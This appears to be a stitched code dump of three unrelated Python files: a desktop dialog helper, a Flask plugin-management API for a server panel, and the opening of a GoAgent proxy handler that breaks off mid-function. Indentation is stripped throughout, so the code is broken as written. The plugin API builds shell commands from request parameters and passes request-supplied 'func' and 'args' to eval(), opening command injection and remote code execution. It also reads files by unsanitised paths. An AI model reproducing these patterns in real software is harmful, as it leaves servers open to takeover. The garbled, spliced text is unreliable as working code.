Minimal width of the dialog window in pixels.
min_height
Minimal width of the dialog window in pixels.
"""
__author__ = "Félix Chénier"
__copyright__ = "Copyright (C) 2020 Félix Chénier"
__email__ = "chenier.felix@uqam.ca"
__license__ = "Apache 2.0"
import os
import sys
import json
import platform
import time
from threading import Thread
import subprocess
import warnings
from typing import Sequence, Union, List
import limitedinteraction.cmd as cmd
# Set some constants
is_pc = True if platform.system() == 'Windows' else False
is_mac = True if platform.system() == 'Darwin' else False
is_linux = True if platform.system() == 'Linux' else False
my_path = os.path.dirname(os.path.abspath(__file__))
# Temporary folder
try:
if is_pc and 'TEMP' in os.environ:
_base_temp_folder = os.environ['TEMP']
_temp_folder = _base_temp_folder + '/limitedinteraction'
elif is_mac and 'TMPDIR' in os.environ:
_base_temp_folder = os.environ['TMPDIR']
_temp_folder = _base_temp_folder + '/limitedinteraction'
else:
_temp_folder = os.environ['HOME'] + '/.limitedinteraction'
try:
os.mkdir(_temp_folder)
except FileExistsError:
pass
except Exception:
warnings.warn('Could not set temporary folder.')
_temp_folder = '.'
# Set some state variables
_message_window_int = [0]
def _define_polling_pause():
"""
Return the polling pause function.
The returned function is a wrapper to either matplotlib.pyplot.pause (in
the case where matplotlib is among the imported modules), or time.sleep
(if matplotlib is not imported).
"""
if 'matplotlib' in sys.modules:
import matplotlib.pyplot as plt
def polling_pause():
"""Pause while refreshing Matplotlib while waiting for user."""
# This rewrite of Matplotlib pause was found here:
# https://stackoverflow.com/questions/45729092/make-interactive-matplotlib-window-not-pop-to-front-on-each-update-windows-7/45734500#45734500
manager = plt._pylab_helpers.Gcf.get_active()
if manager is not None:
canvas = manager.canvas
if canvas.figure.stale:
canvas.draw_idle()
canvas.start_event_loop(0.2)
else:
time.sleep(0.2)
else:
def polling_pause():
"""Pause while waiting for user."""
time.sleep(0.2)
return polling_pause
def _launch_subprocess(blocking=True, debug=False, **kwargs):
"""Launch a function and update event loop while waiting (if blocking)."""
output = [None]
command_call = [
sys.executable, # python3
cmd.__file__, # cmd.py
json.dumps(kwargs)]
if debug:
print('-------')
print(f'command call: {command_call}')
expanded = ''
for _ in command_call:
expanded = expanded + f"'{_}' "
print('-------')
print(f'expanded command call: {expanded}')
def threaded_function():
"""Start cmd.py in its own process and wait for its completion."""
if blocking:
output[0] = subprocess.check_output(command_call,
stderr=subprocess.DEVNULL)
else:
subprocess.call(command_call,
stderr=subprocess.DEVNULL)
# Start the new process in a thread - probably too much but it works and
# it's easy.
thread = Thread(target=threaded_function)
thread.start()
if blocking:
polling_pause = _define_polling_pause()
while output[0] is None:
polling_pause() # Update event loop or just wait.
if output[0] is None:
return None
else:
to_return = json.loads(output[0].decode())
# Check if we should raise an error
if to_return[0] != '':
if to_return[0] == 'ModuleNotFoundError':
raise ModuleNotFoundError(to_return[1])
elif to_return[0] == 'ValueError':
raise ValueError(to_return[1])
else:
raise Exception(to_return[0] + ': ' + to_return[1])
return to_return[1]
def message(
message: str,
**kwargs) -> None:
"""
Show or close a non-blocking message window.
Parameters
----------
message
The message to show. Use '' to close the previous message windows.
kwargs
Consult the module's help for additional parameters.
Returns
-------
None
"""
# Begins by deleting the current message
for file in os.listdir(_temp_folder):
if 'limitedinteraction_message_flag' in file:
os.remove(_temp_folder + '/' + file)
if message is None or message == '':
return
_message_window_int[0] += 1
flagfile = (f"{_temp_folder}/"
f"limitedinteraction_message_flag{_message_window_int}")
fid = open(flagfile, 'w')
fid.write("DELETE THIS FILE TO CLOSE THE LIMITEDINTERACTION MESSAGE "
"WINDOW.")
fid.close()
_launch_subprocess(
blocking=False,
function='message',
message=message,
flagfile=flagfile,
**kwargs)
def button_dialog(
message: str = 'Please select an option',
choices: Sequence[str] = ['OK', 'Cancel'],
**kwargs) -> int:
"""
Show a blocking dialog window with a selection of buttons.
Parameters
----------
message
Optional. Instruction to show to the user.
choices
Optional. List of str, each entry corresponding to a button caption.
kwargs
Consult the module's help for additional parameters.
Returns
-------
int
The selected button index (0 = First button, 1 = Second button, etc.).
If the user closes the window instead of clicking a button, a value
of -1 is returned.
"""
return _launch_subprocess(
function='button_dialog',
message=message,
choices=choices,
**kwargs)
def input_dialog(
message: str = '',
labels: Sequence[str] = [],
initial_values: Sequence[str] = [],
masked: Sequence[bool] = [],
**kwargs) -> Union[str, List[str]]:
"""
Prompt the user with an input dialog.
Parameters
----------
message
Optional. Instruction to show to the user.
labels
Optional. List of str: labels for each input.
initial_values
Optional. List of str: initial values for each input.
masked
Optional. List of bool: True to mask an input using stars.
kwargs
Consult the module's help for additional parameters.
Returns
-------
str or List[str]
If there was only one input, a str corresponding to this input is
returned. If there was multiple inputs, a list of str is returned.
"""
# Run the input dialog in a separate thread to allow updating matplotlib
return _launch_subprocess(
function='input_dialog',
message=message,
labels=labels,
initial_values=initial_values,
masked=masked,
**kwargs)
def get_folder(initial_folder: str = '.', **kwargs) -> str:
"""
Get folder interactively using a file dialog window.
Parameters
----------
initial_folder
Optional. The initial folder of the file dialog.
Returns
-------
str
The full path of the selected folder. An empty string is returned if
the user cancelled.
"""
return _launch_subprocess(
function='get_folder',
initial_folder=initial_folder,
**kwargs)
def get_filename(initial_folder: str = '.', **kwargs) -> str:
"""
Get file name interactively using a file dialog window.
Parameters
----------
initial_folder
Optional. The initial folder of the file dialog.
Returns
-------
str
The full path of the selected file. An empty string is returned if the
user cancelled.
"""
return _launch_subprocess(
function='get_filename',
initial_folder=initial_folder,
**kwargs)
def run_tests():
"""Run interactive tests."""
# Running this script launches the interactive test/demo."
choice = button_dialog(
"Now we will run Limited Interaction's tests.",
["OK, let's go", "Quit"],
icon='gear')
if choice == 0:
#---- Non-interactive tests
try:
something = input_dialog('Test with bad arguments',
labels=['one', 'two', 'three'],
initial_values=['one', 'two'])
raise ValueError('You should not see this error.')
except ValueError:
pass # all is ok
try:
something = button_dialog(left=0, right=0)
raise ValueError('You should not see this error.')
except ValueError:
pass # all is ok
try:
something = button_dialog(top=0, bottom=0)
raise ValueError('You should not see this error.')
except ValueError:
pass # all is ok
#---- Interactive tests
choice = button_dialog(
'Check that "Hello" is written in menu bar,\n'
'then close the window.',
['Click here only if this window is not in the right-bottom corner'],
title='Hello', right=0, bottom=0)
assert choice == -1
something = input_dialog('Close the window again.')
assert something == -1
something = input_dialog('Please enter "test".')
assert something == 'test'
inputs = input_dialog(
'Click ok if:\n'
'- first entry is 1\n'
'- second entry is "test"\n'
'- last entry is masked\n'
'- you see labels titles.\n'
'Close the window otherwise.',
['Label 1', 'Label 2', 'Label 3'],
[1, 'test', 'you should not see it'],
[False, False, True])
assert inputs[0] == '1'
assert inputs[1] == 'test'
assert inputs[2] == 'you should not see it'
message('Pick a folder that is not the current folder.')
foldername = get_folder(icon='gear')
message('Check that you are in the same folder that '
'you just selected,\n'
'then pick any file.')
filename = get_filename(initial_folder=foldername, icon='gear')
message('')
choice = button_dialog(f'Did you select this file:\n{filename}?',
['Yes', 'No'], icon='question')
assert choice == 0
button_dialog('Test completed.', ['OK'])
def __dir__():
return ['message', 'input_dialog', 'button_dialog', 'get_folder', 'get_filename']
|
plugins_api.py | # coding: utf-8
import psutil
import time
import os
import slemp
import re
import json
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import threading
import multiprocessing
from flask import request
class pa_thread(threading.Thread):
def __init__(self, func, args, name=''):
threading.Thread.__init__(self)
self.name = name
self.func = func
self.args = args
self.result = self.func(*self.args)
def getResult(self):
try:
return self.result
except Exception:
return None
class plugins_api:
__tasks = None
__plugin_dir = 'plugins'
__type = 'data/json/type.json'
__index = 'data/json/index.json'
setupPath = None
def __init__(self):
self.setupPath = 'server'
##### ----- start ----- ###
def listApi(self):
sType = request.args.get('type', '0')
sPage = request.args.get('p', '1')
# print sPage
data = self.getPluginList(sType, int(sPage))
return slemp.getJson(data)
def fileApi(self):
name = request.args.get('name', '')
if name.strip() == '':
return ''
f = request.args.get('f', '')
if f.strip() == '':
return ''
file = self.__plugin_dir + '/' + name + '/' + f
if not os.path.exists(file):
return ''
c = slemp.readFile(file)
return c
def indexListApi(self):
data = self.getIndexList()
return slemp.getJson(data)
def indexSortApi(self):
sort = request.form.get('ssort', '')
if sort.strip() == '':
return slemp.returnJson(False, 'Sort data cannot be empty!')
data = self.setIndexSort(sort)
if data:
return slemp.returnJson(True, 'Success!')
return slemp.returnJson(False, 'Fail!')
def installApi(self):
rundir = slemp.getRunDir()
name = request.form.get('name', '')
version = request.form.get('version', '')
mmsg = 'Install'
if hasattr(request.form, 'upgrade'):
mtype = 'update'
mmsg = 'upgrade'
if name.strip() == '':
return slemp.returnJson(False, 'Missing plugin name!', ())
if version.strip() == '':
return slemp.returnJson(False, 'Missing version information!', ())
infoJsonPos = self.__plugin_dir + '/' + name + '/' + 'info.json'
# print infoJsonPos
if not os.path.exists(infoJsonPos):
return slemp.returnJson(False, 'Configuration file does not exist!', ())
pluginInfo = json.loads(slemp.readFile(infoJsonPos))
execstr = "cd " + os.getcwd() + "/plugins/" + \
name + " && /bin/bash " + pluginInfo["shell"] \
+ " install " + version
taskAdd = (None, mmsg + '[' + name + '-' + version + ']',
'execshell', '0', time.strftime('%Y-%m-%d %H:%M:%S'), execstr)
slemp.M('tasks').add('id,name,type,status,addtime, execstr', taskAdd)
return slemp.returnJson(True, 'Install task added to queue!')
def uninstallOldApi(self):
rundir = slemp.getRunDir()
name = request.form.get('name', '')
version = request.form.get('version', '')
if name.strip() == '':
return slemp.returnJson(False, "Missing plugin name!", ())
if version.strip() == '':
return slemp.returnJson(False, "Missing version information!", ())
infoJsonPos = self.__plugin_dir + '/' + name + '/' + 'info.json'
if not os.path.exists(infoJsonPos):
return slemp.returnJson(False, "Configuration file does not exist!", ())
pluginInfo = json.loads(slemp.readFile(infoJsonPos))
execstr = "cd " + os.getcwd() + "/plugins/" + \
name + " && /bin/bash " + pluginInfo["shell"] \
+ " uninstall " + version
taskAdd = (None, 'uninstall [' + name + '-' + version + ']',
'execshell', '0', time.strftime('%Y-%m-%d %H:%M:%S'), execstr)
slemp.M('tasks').add('id,name,type,status,addtime, execstr', taskAdd)
return slemp.returnJson(True, 'Uninstall task added to queue!')
# The uninstall time is short, and it is not added to the task...
def uninstallApi(self):
rundir = slemp.getRunDir()
name = request.form.get('name', '')
version = request.form.get('version', '')
if name.strip() == '':
return slemp.returnJson(False, "Missing plugin name!", ())
if version.strip() == '':
return slemp.returnJson(False, "Missing version information!", ())
infoJsonPos = self.__plugin_dir + '/' + name + '/' + 'info.json'
if not os.path.exists(infoJsonPos):
return slemp.returnJson(False, "Configuration file does not exist!", ())
pluginInfo = json.loads(slemp.readFile(infoJsonPos))
execstr = "cd " + os.getcwd() + "/plugins/" + \
name + " && /bin/bash " + pluginInfo["shell"] \
+ " uninstall " + version
data = slemp.execShell(execstr)
if slemp.isAppleSystem():
print execstr
print data[0], data[1]
return slemp.returnJson(True, 'Uninstallation performed successfully!')
# if data[1] == '':
# return slemp.returnJson(True, 'Uninstalled successfully!')
# else:
# return slemp.returnJson(False, 'Uninstalling error message!' + data[1])
def checkApi(self):
name = request.form.get('name', '')
if name.strip() == '':
return slemp.returnJson(False, "Missing plugin name!", ())
infoJsonPos = self.__plugin_dir + '/' + name + '/' + 'info.json'
if not os.path.exists(infoJsonPos):
return slemp.returnJson(False, "Configuration file does not exist!", ())
return slemp.returnJson(True, "Plugin exists!", ())
def setIndexApi(self):
name = request.form.get('name', '')
status = request.form.get('status', '0')
version = request.form.get('version', '')
if status == '1':
return self.addIndex(name, version)
return self.removeIndex(name, version)
def settingApi(self):
name = request.args.get('name', '')
html = self.__plugin_dir + '/' + name + '/index.html'
return slemp.readFile(html)
def runApi(self):
name = request.form.get('name', '')
func = request.form.get('func', '')
version = request.form.get('version', '')
args = request.form.get('args', '')
script = request.form.get('script', 'index')
data = self.run(name, func, version, args, script)
if data[1] == '':
return slemp.returnJson(True, "OK", data[0].strip())
return slemp.returnJson(False, data[1].strip())
def callbackApi(self):
name = request.form.get('name', '')
func = request.form.get('func', '')
args = request.form.get('args', '')
script = request.form.get('script', 'index')
data = self.callback(name, func, args, script)
if data[0]:
return slemp.returnJson(True, "OK", data[1])
return slemp.returnJson(False, data[1])
def updateZipApi(self):
tmp_path = slemp.getRootDir() + '/temp'
if not os.path.exists(tmp_path):
os.makedirs(tmp_path)
slemp.execShell("rm -rf " + tmp_path + '/*')
tmp_file = tmp_path + '/plugin_tmp.zip'
from werkzeug.utils import secure_filename
from flask import request
f = request.files['plugin_zip']
if f.filename[-4:] != '.zip':
return slemp.returnJson(False, 'Only zip files are supported!')
f.save(tmp_file)
slemp.execShell('cd ' + tmp_path + ' && unzip ' + tmp_file)
os.remove(tmp_file)
p_info = tmp_path + '/info.json'
if not os.path.exists(p_info):
d_path = None
for df in os.walk(tmp_path):
if len(df[2]) < 3:
continue
if not 'info.json' in df[2]:
continue
if not 'install.sh' in df[2]:
continue
if not os.path.exists(df[0] + '/info.json'):
continue
d_path = df[0]
if d_path:
tmp_path = d_path
p_info = tmp_path + '/info.json'
try:
data = json.loads(slemp.readFile(p_info))
data['size'] = slemp.getPathSize(tmp_path)
if not 'author' in data:
data['author'] = 'Unknown'
if not 'home' in data:
data['home'] = 'http://basoro.org/support'
plugin_path = slemp.getPluginDir() + data['name'] + '/info.json'
data['old_version'] = '0'
data['tmp_path'] = tmp_path
if os.path.exists(plugin_path):
try:
old_info = json.loads(slemp.ReadFile(plugin_path))
data['old_version'] = old_info['versions']
except:
pass
except:
slemp.execShell("rm -rf " + tmp_path)
return slemp.returnJson(False, 'No plugin information found in the compressed package, please check the plugin package!')
protectPlist = ('openresty', 'mysql', 'php', 'csvn', 'gogs', 'pureftp')
if data['name'] in protectPlist:
return slemp.returnJson(False, '[' + data['name'] + '], Important plugins cannot be modified!')
return slemp.getJson(data)
def inputZipApi(self):
plugin_name = request.form.get('plugin_name', '')
tmp_path = request.form.get('tmp_path', '')
if not os.path.exists(tmp_path):
return slemp.returnJson(False, 'The temporary file does not exist, please upload again!')
plugin_path = slemp.getPluginDir() + '/' + plugin_name
if not os.path.exists(plugin_path):
print slemp.execShell('mkdir -p ' + plugin_path)
slemp.execShell("\cp -rf " + tmp_path + '/* ' + plugin_path + '/')
slemp.execShell('chmod -R 755 ' + plugin_path)
p_info = slemp.readFile(plugin_path + '/info.json')
if p_info:
slemp.writeLog('Software management', 'Install third-party plugins [%s]' %
json.loads(p_info)['title'])
return slemp.returnJson(True, 'Successful installation!')
slemp.execShell("rm -rf " + plugin_path)
return slemp.returnJson(False, 'Installation failed!')
##### ----- end ----- ###
# does the process exist
def processExists(self, pname, exe=None):
try:
if not self.pids:
self.pids = psutil.pids()
for pid in self.pids:
try:
p = psutil.Process(pid)
if p.name() == pname:
if not exe:
return True
else:
if p.exe() == exe:
return True
except:
pass
return False
except:
return True
# Check if it is installing
def checkSetupTask(self, sName, sVer, sCoexist):
if not self.__tasks:
self.__tasks = slemp.M('tasks').where(
"status!=?", ('1',)).field('status,name').select()
isTask = '1'
for task in self.__tasks:
tmpt = slemp.getStrBetween('[', ']', task['name'])
if not tmpt:
continue
tmp1 = tmpt.split('-')
name1 = tmp1[0].lower()
if sCoexist:
if name1 == sName and tmp1[1] == sVer:
isTask = task['status']
else:
if name1 == sName:
isTask = task['status']
return isTask
def checkStatus(self, info):
if not info['setup']:
return False
data = self.run(info['name'], 'status', info['setup_version'])
if data[0] == 'start':
return True
return False
def checkStatusProcess(self, info, i, return_dict):
if not info['setup']:
return_dict[i] = False
return
data = self.run(info['name'], 'status', info['setup_version'])
if data[0] == 'start':
return_dict[i] = True
else:
return_dict[i] = False
def checkStatusThreads(self, info, i):
if not info['setup']:
return False
data = self.run(info['name'], 'status', info['setup_version'])
if data[0] == 'start':
return True
else:
return False
def checkStatusMThreads(self, plugins_info):
try:
threads = []
ntmp_list = range(len(plugins_info))
for i in ntmp_list:
t = pa_thread(self.checkStatusThreads, (plugins_info[i], i))
threads.append(t)
for i in ntmp_list:
threads[i].start()
for i in ntmp_list:
threads[i].join()
for i in ntmp_list:
t = threads[i].getResult()
plugins_info[i]['status'] = t
except Exception as e:
print 'checkStatusMThreads:', str(e)
return plugins_info
def checkStatusMProcess(self, plugins_info):
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for i in range(len(plugins_info)):
p = multiprocessing.Process(
target=self.checkStatusProcess, args=(plugins_info[i], i, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
returnData = return_dict.values()
for i in ntmp_list:
plugins_info[i]['status'] = returnData[i]
return plugins_info
def checkDisplayIndex(self, name, version):
if not os.path.exists(self.__index):
slemp.writeFile(self.__index, '[]')
indexList = json.loads(slemp.readFile(self.__index))
if type(version) == list:
for index in range(len(version)):
vname = name + '-' + version[index]
if vname in indexList:
return True
else:
vname = name + '-' + version
if vname in indexList:
return True
return False
def getVersion(self, path):
version_f = path + '/version.pl'
if os.path.exists(version_f):
return slemp.readFile(version_f).strip()
return ''
# Construct local plugin information
def getPluginInfo(self, info):
checks = ''
path = ''
coexist = False
if info["checks"][0:1] == '/':
checks = info["checks"]
else:
checks = slemp.getRootDir() + '/' + info['checks']
if info.has_key('path'):
path = info['path']
if path[0:1] != '/':
path = slemp.getRootDir() + '/' + path
if info.has_key('coexist') and info['coexist']:
coexist = True
pInfo = {
"id": 10000,
"pid": info['pid'],
"type": 1000,
"name": info['name'],
"title": info['title'],
"ps": info['ps'],
"dependnet": "",
"mutex": "",
"path": path,
"install_checks": checks,
"uninsatll_checks": checks,
"coexist": coexist,
"versions": info['versions'],
# "updates": info['updates'],
"display": False,
"setup": False,
"setup_version": "",
"status": False,
}
if checks.find('VERSION') > -1:
pInfo['install_checks'] = checks.replace(
'VERSION', info['versions'])
if path.find('VERSION') > -1:
pInfo['path'] = path.replace(
'VERSION', info['versions'])
pInfo['task'] = self.checkSetupTask(
pInfo['name'], info['versions'], coexist)
pInfo['display'] = self.checkDisplayIndex(
info['name'], pInfo['versions'])
pInfo['setup'] = os.path.exists(pInfo['install_checks'])
if coexist and pInfo['setup']:
pInfo['setup_version'] = info['versions']
else:
pInfo['setup_version'] = self.getVersion(pInfo['install_checks'])
# pluginInfo['status'] = self.checkStatus(pluginInfo)
pInfo['status'] = False
return pInfo
def makeCoexist(self, data):
plugins_info = []
for index in range(len(data['versions'])):
tmp = data.copy()
tmp['title'] = tmp['title'] + \
'-' + data['versions'][index]
tmp['versions'] = data['versions'][index]
pg = self.getPluginInfo(tmp)
plugins_info.append(pg)
return plugins_info
def makeList(self, data, sType='0'):
plugins_info = []
if (data['pid'] == sType):
if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
tmp_data = self.makeCoexist(data)
for index in range(len(tmp_data)):
plugins_info.append(tmp_data[index])
else:
pg = self.getPluginInfo(data)
plugins_info.append(pg)
return plugins_info
if sType == '0':
if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
tmp_data = self.makeCoexist(data)
for index in range(len(tmp_data)):
plugins_info.append(tmp_data[index])
else:
pg = self.getPluginInfo(data)
plugins_info.append(pg)
# print plugins_info, data
return plugins_info
def getAllList(self, sType='0'):
plugins_info = []
for dirinfo in os.listdir(self.__plugin_dir):
if dirinfo[0:1] == '.':
continue
path = self.__plugin_dir + '/' + dirinfo
if os.path.isdir(path):
json_file = path + '/info.json'
if os.path.exists(json_file):
try:
data = json.loads(slemp.readFile(json_file))
tmp_data = self.makeList(data, sType)
for index in range(len(tmp_data)):
plugins_info.append(tmp_data[index])
except Exception, e:
print e
return plugins_info
def getAllListPage(self, sType='0', page=1, pageSize=10):
plugins_info = []
for dirinfo in os.listdir(self.__plugin_dir):
if dirinfo[0:1] == '.':
continue
path = self.__plugin_dir + '/' + dirinfo
if os.path.isdir(path):
json_file = path + '/info.json'
if os.path.exists(json_file):
try:
data = json.loads(slemp.readFile(json_file))
tmp_data = self.makeList(data, sType)
for index in range(len(tmp_data)):
plugins_info.append(tmp_data[index])
except Exception, e:
print e
start = (page - 1) * pageSize
end = start + pageSize
_plugins_info = plugins_info[start:end]
_plugins_info = self.checkStatusMThreads(_plugins_info)
return (_plugins_info, len(plugins_info))
def makeListThread(self, data, sType='0'):
plugins_info = []
if (data['pid'] == sType):
if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
tmp_data = self.makeCoexist(data)
for index in range(len(tmp_data)):
plugins_info.append(tmp_data[index])
else:
pg = self.getPluginInfo(data)
plugins_info.append(pg)
return plugins_info
if sType == '0':
if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
tmp_data = self.makeCoexist(data)
for index in range(len(tmp_data)):
plugins_info.append(tmp_data[index])
else:
pg = self.getPluginInfo(data)
plugins_info.append(pg)
# print plugins_info, data
return plugins_info
def getAllListThread(self, sType='0'):
plugins_info = []
tmp_list = []
threads = []
for dirinfo in os.listdir(self.__plugin_dir):
if dirinfo[0:1] == '.':
continue
path = self.__plugin_dir + '/' + dirinfo
if os.path.isdir(path):
json_file = path + '/info.json'
if os.path.exists(json_file):
data = json.loads(slemp.readFile(json_file))
if sType == '0':
tmp_list.append(data)
if (data['pid'] == sType):
tmp_list.append(data)
ntmp_list = range(len(tmp_list))
for i in ntmp_list:
t = pa_thread(self.makeListThread, (tmp_list[i], sType))
threads.append(t)
for i in ntmp_list:
threads[i].start()
for i in ntmp_list:
threads[i].join()
for i in ntmp_list:
t = threads[i].getResult()
for index in range(len(t)):
plugins_info.append(t[index])
return plugins_info
def makeListProcess(self, data, sType, i, return_dict):
plugins_info = []
if (data['pid'] == sType):
if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
tmp_data = self.makeCoexist(data)
for index in range(len(tmp_data)):
plugins_info.append(tmp_data[index])
else:
pg = self.getPluginInfo(data)
plugins_info.append(pg)
# return plugins_info
if sType == '0':
if type(data['versions']) == list and data.has_key('coexist') and data['coexist']:
tmp_data = self.makeCoexist(data)
for index in range(len(tmp_data)):
plugins_info.append(tmp_data[index])
else:
pg = self.getPluginInfo(data)
plugins_info.append(pg)
return_dict[i] = plugins_info
# return plugins_info
def getAllListProcess(self, sType='0'):
plugins_info = []
tmp_list = []
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
for dirinfo in os.listdir(self.__plugin_dir):
if dirinfo[0:1] == '.':
continue
path = self.__plugin_dir + '/' + dirinfo
if os.path.isdir(path):
json_file = path + '/info.json'
if os.path.exists(json_file):
data = json.loads(slemp.readFile(json_file))
if sType == '0':
tmp_list.append(data)
if (data['pid'] == sType):
tmp_list.append(data)
ntmp_list = range(len(tmp_list))
for i in ntmp_list:
p = multiprocessing.Process(
target=self.makeListProcess, args=(tmp_list[i], sType, i, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
returnData = return_dict.values()
for i in ntmp_list:
for index in range(len(returnData[i])):
plugins_info.append(returnData[i][index])
return plugins_info
def getPluginList(self, sType, sPage=1, sPageSize=10):
# print sType, sPage, sPageSize
ret = {}
ret['type'] = json.loads(slemp.readFile(self.__type))
# plugins_info = self.getAllListThread(sType)
# plugins_info = self.getAllListProcess(sType)
data = self.getAllListPage(sType, sPage, sPageSize)
ret['data'] = data[0]
args = {}
args['count'] = data[1]
args['p'] = sPage
args['tojs'] = 'getSList'
args['row'] = sPageSize
ret['list'] = slemp.getPage(args)
return ret
def getIndexList(self):
if not os.path.exists(self.__index):
slemp.writeFile(self.__index, '[]')
indexList = json.loads(slemp.readFile(self.__index))
plist = []
app = []
for i in indexList:
info = i.split('-')
if not info[0] in app:
app.append(info[0])
path = self.__plugin_dir + '/' + info[0]
if os.path.isdir(path):
json_file = path + '/info.json'
if os.path.exists(json_file):
try:
data = json.loads(slemp.readFile(json_file))
tmp_data = self.makeList(data)
for index in range(len(tmp_data)):
if tmp_data[index]['versions'] == info[1] or info[1] in tmp_data[index]['versions']:
tmp_data[index]['display'] = True
plist.append(tmp_data[index])
continue
except Exception, e:
print 'getIndexList:', e
# Cannot use multiprocessing when using gevent mode
# plist = self.checkStatusMProcess(plist)
plist = self.checkStatusMThreads(plist)
return plist
def setIndexSort(self, sort):
data = sort.split('|')
slemp.writeFile(self.__index, json.dumps(data))
return True
def addIndex(self, name, version):
if not os.path.exists(self.__index):
slemp.writeFile(self.__index, '[]')
indexList = json.loads(slemp.readFile(self.__index))
vname = name + '-' + version
if vname in indexList:
return slemp.returnJson(False, 'Please don\'t add more!')
if len(indexList) >= 12:
return slemp.returnJson(False, 'The home page can only display up to 12 software!')
indexList.append(vname)
slemp.writeFile(self.__index, json.dumps(indexList))
return slemp.returnJson(True, 'Added successfully!')
def removeIndex(self, name, version):
if not os.path.exists(self.__index):
slemp.writeFile(self.__index, '[]')
indexList = json.loads(slemp.readFile(self.__index))
vname = name + '-' + version
if not vname in indexList:
return slemp.returnJson(True, 'Successfully deleted!')
indexList.remove(vname)
slemp.writeFile(self.__index, json.dumps(indexList))
return slemp.returnJson(True, 'Successfully deleted!')
# shell transfer
def run(self, name, func, version, args='', script='index'):
path = slemp.getRunDir() + '/' + self.__plugin_dir + \
'/' + name + '/' + script + '.py'
py = 'python ' + path
if args == '':
py_cmd = py + ' ' + func + ' ' + version
else:
py_cmd = py + ' ' + func + ' ' + version + ' ' + args
if not os.path.exists(path):
return ('', '')
data = slemp.execShell(py_cmd)
# data = os.popen(py_cmd).read()
if slemp.isAppleSystem():
print 'run', py_cmd
# print os.path.exists(py_cmd)
return (data[0].strip(), data[1].strip())
# Map package calls
def callback(self, name, func, args='', script='index'):
package = slemp.getRunDir() + '/plugins/' + name
if not os.path.exists(package):
return (False, "Plugin does not exist!")
sys.path.append(package)
eval_str = "__import__('" + script + "')." + func + '(' + args + ')'
newRet = eval(eval_str)
if slemp.isAppleSystem():
print 'callback', eval_str
return (True, newRet)
|
gae_handler.py | #!/usr/bin/env python
# coding:utf-8
"""
GoAgent local-server protocol 3.2
request:
POST /_gh/ HTTP/1.1
HOST: appid.appspot.com
content-length: xxx
http content:
此为body
{
pack_req_head_len: 2 bytes,#POST 时使用
pack_req_head : deflate{
此为负载
original request line,
original request headers,
X-URLFETCH-kwargs HEADS, {
password,
maxsize, defined in config AUTO RANGE MAX SIZE
timeout, request timeout for GAE urlfetch.
}
}
body
}
response:
200 OK
http-Heads:
Content-type: image/gif
headers from real_server
# real_server 为gae让客户端以为的服务器
#可能被gae改变,但对客户端不可见
#未分片body也直接发给客户端
# body 分为下面两部分
http-content:{
response_head{
data_len: 2 bytes,
data: deflate{
HTTP/1.1 status, status_code
headers
content = error_message, if GAE server fail
}
}
body
}
"""
import errno
import time
import xstruct as struct
import re
import string
import ssl
import urlparse
import threading
import zlib
import traceback
from mimetypes import guess_type
import check_local_network
from front import front
from xlog import getLogger
xlog = getLogger("gae_proxy")
def inflate(data):
return zlib.decompress(data, -zlib.MAX_WBITS)
def deflate(data):
return zlib.compress(data)[2:-4]
class GAE_Exception(Exception):
def __init__(self, error_code, message):
xlog.debug("GAE_Exception %r %r", error_code, message)
self.error_code = error_code
self.message = "%r:%s" % (error_code, message)
def __str__(self):
# for %s
return repr(self.message)
def __repr__(self):
# for %r
return repr(self.message)
def generate_message_html(title, banner, detail=''):
MESSAGE_TEMPLATE = '''
<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>$title</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {font-size: 10pt; font-family: arial,sans-serif}
span.nav {font-size: 10pt; font-family: arial,sans-serif; font-weight: bold}
div.nav A,span.big {font-size: 12pt; color: #0000cc}
div.nav A {font-size: 10pt; color: black}
A.l:link {color: #6f6f6f}
A.u:link {color: green}
//--></style>
</head>
<body text=#000000 bgcolor=#ffffff>
<table border=0 cellpadding=2 cellspacing=0 width=100%>
<tr><td bgcolor=#3366cc><font face=arial,sans-serif color=#ffffff><b>Message</b></td></tr>
<tr><td> </td></tr></table>
<blockquote>
<H1>$banner</H1>
$detail
<p>
</blockquote>
<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#3366cc><img alt="" width=1 height=4></td></tr></table>
</body></html>
'''
return string.Template(MESSAGE_TEMPLATE).substitute(
title=title, banner=banner, detail=detail)
def spawn_later(seconds, target, *args, **kwargs):
def wrap(*args, **kwargs):
__import__('time').sleep(seconds)
try:
result = target(*args, **kwargs)
except BaseException:
result = None
return result
return __import__('thread').start_new_thread(wrap, args, kwargs)
skip_request_headers = frozenset([
'Vary',
'Via',
'Proxy-Authorization',
'Proxy-Connection',
'Upgrade',
'X-Google-Cache-Control',
'X-Forwarded-For',
'X-Chrome-Variations',
])
skip_response_headers = frozenset([
# http://en.wikipedia.org/wiki/Chunked_transfer_encoding
'Connection',
'Upgrade',
'Alt-Svc',
'Alternate-Protocol',
'X-Head-Content-Length',
'X-Google-Cache-Control',
'X-Chrome-Variations',
])
def send_header(wfile, keyword, value):
keyword = keyword.title()
if keyword == 'Set-Cookie':
# https://cloud.google.com/appengine/docs/python/urlfetch/responseobjects
for cookie in re.split(r', (?=[^ =]+(?:=|$))', value):
wfile.write("%s: %s\r\n" % (keyword, cookie))
#xlog.debug("Head1 %s: %s", keyword, cookie)
elif keyword == 'Content-Disposition' and '"' not in value:
value = re.sub(r'filename=([^"\']+)', 'filename="\\1"', value)
wfile.write("%s: %s\r\n" % (keyword, value))
#xlog.debug("Head1 %s: %s", keyword, value)
elif keyword in skip_response_headers:
return
else:
wfile.write("%s: %s\r\n" % (keyword, value))
#xlog.debug("Head1 %s: %s", keyword, value)
def send_response(wfile, status=404, headers={}, body=''):
headers = dict((k.title(), v) for k, v in headers.items())
if 'Transfer-Encoding' in headers:
del headers['Transfer-Encoding']
if 'Content-Length' not in headers:
headers['Content-Length'] = len(body)
if 'Connection' not in headers:
headers['Connection'] = 'close'
try:
